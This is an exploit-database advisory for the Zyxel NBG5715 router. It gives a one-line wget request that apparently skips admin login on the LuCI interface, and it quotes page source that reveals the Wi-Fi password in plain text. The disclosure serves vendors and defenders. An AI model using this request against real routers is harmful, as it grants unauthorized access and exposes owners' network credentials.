Zyxel NBG5715 Local admin privileges bypass Vulnerability

🗓️ 31 May 2013 00:00:00Reported by drwxrwxrwxType

zdt🔗 0day.today👁 73 Views

Zyxel NBG5715 Local admin privileges bypass and Plain Text Password Disclosure Vulnerabilit

==================================================================================================
    | |                                                                  
  __| | _ __ __      ____  __ _ __ __      ____  __ _ __ __      ____  __
 / _` || '__|\ \ /\ / /\ \/ /| '__|\ \ /\ / /\ \/ /| '__|\ \ /\ / /\ \/ /
| (_| || |    \ V  V /  >  < | |    \ V  V /  >  < | |    \ V  V /  >  < 
 \__,_||_|     \_/\_/  /_/\_\|_|     \_/\_/  /_/\_\|_|     \_/\_/  /_/\_\
==================================================================================================
Zyxel NBG5715
Simultaneous Dual-Band Wireless N900 Media Router
Local admin privileges bypass and Local Wireless Plain Text Password Disclosure
Firmware Version Affected:	NBG5715_1.00
Release Date: 20 November 2012
Discover: drwxrwxrwx <[email protected]>
Vendor: ZyXEL
Products Affected: NBG5715

==================================================================================================
VULN: Local admin privileges bypass doing wget 192.168.1.1/cgi-bin/luci/;stok=/easy/networkmap#
==================================================================================================
DATA:

<title>.::Welcome to ZyXEL NBG5715::.</title>

	with ( document.forms[0] ){
		/* 2.4G */
		if(wlanRadio.selectedIndex == 0){
			wlanSSID.value = "Defaultssid";
			
				wlanSec.selectedIndex = 2;
			
			
			wlanPwd.value = "thedefaultpassword";
		}
		else{ /* 5G */
			wlanSSID.value = "Defaultssid";
			
				wlanSec.selectedIndex = 2;
			
			
			wlanPwd.value = "thedefaultpassword";
		}
		changeSec();
	}
}
==================================================================================================
Gretz

#  0day.today [2018-04-04]  #

31 May 2013 00:00Current

6.8Medium risk

Vulners AI Score6.8